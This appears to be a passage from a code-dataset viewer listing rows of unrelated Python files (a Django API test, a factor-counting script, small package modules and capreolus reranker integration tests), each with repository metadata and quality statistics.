Skill.objects.all().delete()
self.skill = SkillFactory.create_batch(40)
self.client = JSONAPITestClient()
def test_get_skills_authenticated(self):
user = BlueBottleUserFactory.create()
response = self.client.get(self.url, user=user)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 40)
def test_get_skills_unauthenticated(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 401)
def test_get_skills_old_url(self):
old_url = reverse('assignment-skill-list')
user = BlueBottleUserFactory.create()
response = self.client.get(old_url, user=user)
self.assertEqual(response.status_code, 200)
| 36.989844 | 112 | 0.626185 | 10,651 | 101,981 | 5.868088 | 0.044597 | 0.080159 | 0.062559 | 0.054143 | 0.860658 | 0.834739 | 0.803523 | 0.777732 | 0.74578 | 0.732436 | 0 | 0.01385 | 0.245987 | 101,981 | 2,756 | 113 | 37.003266 | 0.79896 | 0.00352 | 0 | 0.657515 | 0 | 0.008841 | 0.101988 | 0.023088 | 0 | 0 | 0 | 0 | 0.1745 | 1 | 0.082829 | false | 0 | 0.010237 | 0 | 0.144253 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
95b9f93733f0c0da31f6f2eef5ea4057e89110de | 716 | py | Python | factor.py | kumaraditya303/General-Programs | bb1365dd7fa0a45809301ba1c7090726756a0bed | [
"MIT"
] | 2 | 2020-07-13T20:43:59.000Z | 2021-02-26T03:04:56.000Z | factor.py | kumaraditya303/General-Programs | bb1365dd7fa0a45809301ba1c7090726756a0bed | [
"MIT"
] | null | null | null | factor.py | kumaraditya303/General-Programs | bb1365dd7fa0a45809301ba1c7090726756a0bed | [
"MIT"
] | null | null | null | x = int(input("Enter A Number = "))
y = 0
if x > 1:
for i in range(1, x+1, 1):
if (x % i) == 0:
print("Factor = ", str(i))
y += 1
if y == 2:
print(str(x)+" is a Prime Number.")
else:
print("Number of Factors of "+str(x)+" = "+str(y)+".")
if x == 0:
print("You entered 0.")
if x == -1:
print("-1 is a Unique Number.")
if x == 1:
print("1 is a Unique Number.")
if x < -1:
for i in range(-1, x-1, -1):
if (x % i) == 0:
print("Factor = ", str(i))
y += 1
if y == 2:
print(str(x)+" is a Prime Number.")
else:
print("Number of Factors of "+str(x)+" = "+str(y)+".")
| 26.518519 | 63 | 0.414804 | 115 | 716 | 2.582609 | 0.226087 | 0.070707 | 0.053872 | 0.03367 | 0.855219 | 0.855219 | 0.855219 | 0.855219 | 0.855219 | 0.855219 | 0 | 0.047404 | 0.381285 | 716 | 26 | 64 | 27.538462 | 0.623025 | 0 | 0 | 0.538462 | 0 | 0 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.346154 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
95ca4a8215829b5a1f64f36a1c01705f54856374 | 106 | py | Python | darwinpush/messages/TrainAlertMessage.py | fasteroute/darwinpush | c919049e076cbdf61007fc9cc1c5a0271cde7929 | [
"Apache-2.0"
] | 3 | 2015-08-15T15:38:06.000Z | 2019-08-06T11:09:32.000Z | darwinpush/messages/TrainAlertMessage.py | grundleborg/darwinpush | c919049e076cbdf61007fc9cc1c5a0271cde7929 | [
"Apache-2.0"
] | 34 | 2015-07-22T13:47:16.000Z | 2015-08-12T17:40:23.000Z | darwinpush/messages/TrainAlertMessage.py | grundleborg/darwinpush | c919049e076cbdf61007fc9cc1c5a0271cde7929 | [
"Apache-2.0"
] | 1 | 2015-08-30T15:26:24.000Z | 2015-08-30T15:26:24.000Z | from darwinpush.messages.BaseMessage import BaseMessage
class TrainAlertMessage(BaseMessage):
pass
| 15.142857 | 55 | 0.820755 | 10 | 106 | 8.7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 106 | 6 | 56 | 17.666667 | 0.945652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
95dd358365310ad36ff330c1e2b912dcf2b55ea9 | 40 | py | Python | src/polyoligo/__main__.py | MirkoLedda/polyoligo | c9fc952fbc7315f426a137313fb36cd16a5e5957 | [
"BSD-2-Clause"
] | 3 | 2019-07-26T20:09:50.000Z | 2022-01-11T00:56:45.000Z | src/polyoligo/__main__.py | MirkoLedda/polyoligo | c9fc952fbc7315f426a137313fb36cd16a5e5957 | [
"BSD-2-Clause"
] | 1 | 2021-04-21T13:27:45.000Z | 2021-04-21T13:27:45.000Z | src/polyoligo/__main__.py | MirkoLedda/polyoligo | c9fc952fbc7315f426a137313fb36cd16a5e5957 | [
"BSD-2-Clause"
] | 2 | 2020-02-10T22:34:15.000Z | 2022-03-01T21:29:01.000Z | from . import cli_kasp
cli_kasp.main()
| 10 | 22 | 0.75 | 7 | 40 | 4 | 0.714286 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 40 | 3 | 23 | 13.333333 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
95f9c06e3b805cccea1b33ccbe2dde50fc48b8bb | 47 | py | Python | lyricsgenius/types/__init__.py | JordanPCF/LyricsGenius | eb8c6b3fb3ba12eb8420cf93739959720a5d6def | [
"MIT"
] | null | null | null | lyricsgenius/types/__init__.py | JordanPCF/LyricsGenius | eb8c6b3fb3ba12eb8420cf93739959720a5d6def | [
"MIT"
] | null | null | null | lyricsgenius/types/__init__.py | JordanPCF/LyricsGenius | eb8c6b3fb3ba12eb8420cf93739959720a5d6def | [
"MIT"
] | null | null | null | from .base import Stats
from .song import Song
| 15.666667 | 23 | 0.787234 | 8 | 47 | 4.625 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 24 | 23.5 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2501195a9dbe21ca1a90874cdad6e9da67a22b29 | 132 | py | Python | Verzweigungen/Mehrfach/mehrfach.py | DietrichPaul/Einstieg-in-Python | 0d28402f962773274d85e6bb169ae631c91f66ce | [
"CC0-1.0"
] | null | null | null | Verzweigungen/Mehrfach/mehrfach.py | DietrichPaul/Einstieg-in-Python | 0d28402f962773274d85e6bb169ae631c91f66ce | [
"CC0-1.0"
] | null | null | null | Verzweigungen/Mehrfach/mehrfach.py | DietrichPaul/Einstieg-in-Python | 0d28402f962773274d85e6bb169ae631c91f66ce | [
"CC0-1.0"
] | null | null | null | x = -5
print("x:", x)
if x > 0:
print("x ist positiv")
elif x < 0:
print("x ist negativ")
else:
print("x ist gleich 0")
| 14.666667 | 27 | 0.537879 | 25 | 132 | 2.84 | 0.44 | 0.338028 | 0.380282 | 0.225352 | 0.309859 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 0.272727 | 132 | 8 | 28 | 16.5 | 0.697917 | 0 | 0 | 0 | 0 | 0 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
253cac1c22a02bad771b13717f545e8db1aed32d | 11,808 | py | Python | capreolus/tests/test_integration.py | bpiwowar/capreolus-xpm | 5374eb48df96b54d51365fc32441ae50a3e634c2 | [
"Apache-2.0"
] | null | null | null | capreolus/tests/test_integration.py | bpiwowar/capreolus-xpm | 5374eb48df96b54d51365fc32441ae50a3e634c2 | [
"Apache-2.0"
] | null | null | null | capreolus/tests/test_integration.py | bpiwowar/capreolus-xpm | 5374eb48df96b54d51365fc32441ae50a3e634c2 | [
"Apache-2.0"
] | null | null | null | """
Integrations tests. Trains different rerankers from scratch.
"""
import json
import os
import pytest
from pymagnitude import Magnitude
from capreolus import train
from capreolus import train_pipeline, evaluate_pipeline
from capreolus.collection import COLLECTIONS
from capreolus.demo_app.utils import search_files_or_folders_in_directory
from capreolus.extractor.deeptileextractor import DeepTileExtractor
from capreolus.extractor.embedtext import EmbedText
from capreolus.pipeline import Pipeline
from capreolus.reranker.KNRM import KNRM
from capreolus.utils.loginit import get_logger
logger = get_logger(__name__) # pylint: disable=invalid-name
def test_knrm(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
pipeline = Pipeline({"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
pipeline.ex.main(train.train)
monkeypatch.setattr(train, "pipeline", pipeline)
monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
pipeline.ex.run(config_updates={"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
logger.info("Base path is {0}".format(pipeline.base_path))
config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
assert len(config_files) == 1
config_file = json.load(open(config_files[0], "rt"))
assert config_file["reranker"] == "KNRM"
assert config_file["niters"] == 1
run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
weight_dir = os.path.join(run_path, "weights")
weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
assert len(weight_file) == 1
def test_convknrm(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
pipeline = Pipeline({"reranker": "ConvKNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
pipeline.ex.main(train.train)
monkeypatch.setattr(train, "pipeline", pipeline)
monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
pipeline.ex.run(config_updates={"reranker": "ConvKNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
logger.info("Base path is {0}".format(pipeline.base_path))
config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
assert len(config_files) == 1
config_file = json.load(open(config_files[0], "rt"))
assert config_file["reranker"] == "ConvKNRM"
assert config_file["niters"] == 1
run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
weight_dir = os.path.join(run_path, "weights")
weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
assert len(weight_file) == 1
def test_drmm(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
pipeline = Pipeline({"reranker": "DRMM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
pipeline.ex.main(train.train)
monkeypatch.setattr(train, "pipeline", pipeline)
monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
pipeline.ex.run(config_updates={"reranker": "DRMM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
logger.info("Base path is {0}".format(pipeline.base_path))
config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
assert len(config_files) == 1
config_file = json.load(open(config_files[0], "rt"))
assert config_file["reranker"] == "DRMM"
assert config_file["niters"] == 1
run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
weight_dir = os.path.join(run_path, "weights")
weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
assert len(weight_file) == 1
def test_positdrmm(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
pipeline = Pipeline({"reranker": "POSITDRMM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
pipeline.ex.main(train.train)
monkeypatch.setattr(train, "pipeline", pipeline)
monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
pipeline.ex.run(config_updates={"reranker": "POSITDRMM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
logger.info("Base path is {0}".format(pipeline.base_path))
config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
assert len(config_files) == 1
config_file = json.load(open(config_files[0], "rt"))
assert config_file["reranker"] == "POSITDRMM"
assert config_file["niters"] == 1
run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
weight_dir = os.path.join(run_path, "weights")
weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
assert len(weight_file) == 1
def test_dssm_trigram(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
pipeline = Pipeline({"reranker": "DSSM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1, "datamode": "trigram"})
pipeline.ex.main(train.train)
monkeypatch.setattr(train, "pipeline", pipeline)
pipeline.ex.run(config_updates={"reranker": "DSSM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
assert len(config_files) == 1
config_file = json.load(open(config_files[0], "rt"))
assert config_file["reranker"] == "DSSM"
assert config_file["niters"] == 1
run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
weight_dir = os.path.join(run_path, "weights")
weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
assert len(weight_file) == 1
def test_deeptilebar(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
monkeypatch.setattr(DeepTileExtractor, "get_magnitude_embeddings", fake_magnitude_embedding)
pipeline = Pipeline(
{"reranker": "DeepTileBar", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1, "passagelen": "3"}
)
pipeline.ex.main(train.train)
monkeypatch.setattr(train, "pipeline", pipeline)
pipeline.ex.run(config_updates={"reranker": "DeepTileBar", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
assert len(config_files) == 1
config_file = json.load(open(config_files[0], "rt"))
assert config_file["reranker"] == "DeepTileBar"
assert config_file["niters"] == 1
run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
weight_dir = os.path.join(run_path, "weights")
weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
assert len(weight_file) == 1
def test_train_api(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
pipeline = train_pipeline({"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
assert pipeline.reranker.__class__ == KNRM
ndcg_vals = evaluate_pipeline(pipeline)
assert ndcg_vals == [0.6309297535714575]
def test_train_api_early_stopping(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
pipeline = train_pipeline(
{"reranker": "KNRM", "niters": 5, "benchmark": "dummy", "itersize": 1, "batch": 1}, early_stopping=True
)
assert pipeline.reranker.__class__ == KNRM
ndcg_vals = evaluate_pipeline(pipeline)
assert ndcg_vals == [0.6309297535714575]
def test_api_data_sources(monkeypatch, tmpdir):
monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
monkeypatch.setenv("CAPREOLUS_CACHE", str(os.path.join(tmpdir, "cache")))
fake_qrels_path = os.path.join(tmpdir, "fake_qrels.txt")
with open(fake_qrels_path, "w") as fp:
qrels = "301 0 LA010189-0001 0\n301 0 LA010189-0002 1"
fp.write(qrels)
def fake_magnitude_embedding(*args, **kwargs):
return Magnitude(None)
monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
pipeline = train_pipeline(
{"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1}, {"qrels": fake_qrels_path}
)
assert pipeline.reranker.__class__ == KNRM
ndcg_vals = evaluate_pipeline(pipeline)
# The ndcg score changed since the retrieved order is now the best order
assert ndcg_vals == [1.0]
# This test should be placed at the very end. Setting is_large_collection will mess up other tests
# TODO: Fix this? Simple fix: set dummy_collection.is_large_collection = False after the test
# def test_knrm_for_is_large_collection(monkeypatch, tmpdir):
# monkeypatch.setenv("CAPREOLUS_RESULTS", str(os.path.join(tmpdir, "results")))
#
# def fake_magnitude_embedding(*args, **kwargs):
# return Magnitude(None)
#
# pipeline = Pipeline({"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
# pipeline.ex.main(train.train)
# COLLECTIONS["dummy"].is_large_collection = True
# monkeypatch.setattr(train, "pipeline", pipeline)
# monkeypatch.setattr(EmbedText, "get_magnitude_embeddings", fake_magnitude_embedding)
# pipeline.ex.run(config_updates={"reranker": "KNRM", "niters": 1, "benchmark": "dummy", "itersize": 1, "batch": 1})
# logger.info("Is collection large? : {0}".format(pipeline.collection.is_large_collection))
#
# config_files = search_files_or_folders_in_directory(pipeline.base_path, "config.json")
# assert len(config_files) == 1
# config_file = json.load(open(config_files[0], "rt"))
# assert config_file["reranker"] == "KNRM"
# assert config_file["niters"] == 1
#
# run_path = os.path.join(pipeline.reranker_path, pipeline.cfg["fold"])
# weight_dir = os.path.join(run_path, "weights")
# weight_file = search_files_or_folders_in_directory(weight_dir, "dev")
# assert len(weight_file) == 1
| 45.068702 | 130 | 0.714431 | 1,499 | 11,808 | 5.407605 | 0.097398 | 0.025167 | 0.041944 | 0.039477 | 0.851221 | 0.851221 | 0.843819 | 0.837404 | 0.837404 | 0.837404 | 0 | 0.014859 | 0.139397 | 11,808 | 261 | 131 | 45.241379 | 0.782818 | 0.137195 | 0 | 0.684211 | 0 | 0 | 0.175613 | 0.018911 | 0 | 0 | 0 | 0.003831 | 0.175439 | 1 | 0.105263 | false | 0.005848 | 0.076023 | 0.052632 | 0.233918 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.